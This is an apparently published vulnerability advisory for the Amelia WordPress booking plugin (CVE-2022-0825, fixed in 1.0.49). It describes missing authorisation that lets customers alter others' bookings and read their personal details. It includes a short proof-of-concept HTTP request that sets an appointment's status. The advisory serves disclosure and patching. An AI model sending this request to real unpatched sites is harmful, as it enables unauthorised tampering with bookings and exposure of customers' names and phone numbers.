WordPress Plugin Vulnerabilities

Amelia < 1.0.49 - Customer+ Arbitrary Appointments Status Update

Description

The plugin does not have proper authorisation when managing appointments, allowing any customer to update other's booking status, as well as retrieve sensitive information about the bookings, such as the full name and phone number of the person who booked it.

Proof of Concept

1. Make a booking to become customer
2. Login to WordPress with the customer account and make the following request (the ameliaNonce can be retrieved via "wpAmeliaNonce" under the Amelia dashboard)

POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments/status/2&ameliaNonce=e9ff5220c4 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 711
Connection: close
Cookie: [customer+ cookies]

{"status": "approved","packageCustomerId": null}

Affects Plugins

Plugin icon
ameliabooking
Fixed in 1.0.49

References

CVE
CVE-2022-0825
URL
https://plugins.trac.wordpress.org/changeset/2693545

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Huli from Cymetrics
Submitter
Huli from Cymetrics
Submitter website
https://cymetrics.io
Verified
Yes
WPVDB ID
1a92a65f-e9df-41b5-9a1c-8e24ee9bf50e

Timeline

Publicly Published
2022-03-14 (about 2 years ago)
Added
2022-03-14 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2023-09-05
Title
Starter Templates <= 3.2.5 - Incorrect Authorization
Published
2024-02-19
Title
Contact Form builder with drag & drop for WordPress – Kali Forms < 2.3.42 - Missing Authorization
Published
2023-11-09
Title
WooCommerce Checkout Manager < 7.3.1 - Missing Authorization
Published
2024-04-23
Title
Page Builder: Live Composer < 1.5.39 - Missing Authorization
Published
2023-10-25
Title
YITH WooCommerce Product Add-Ons < 4.2.1 - Missing Authorization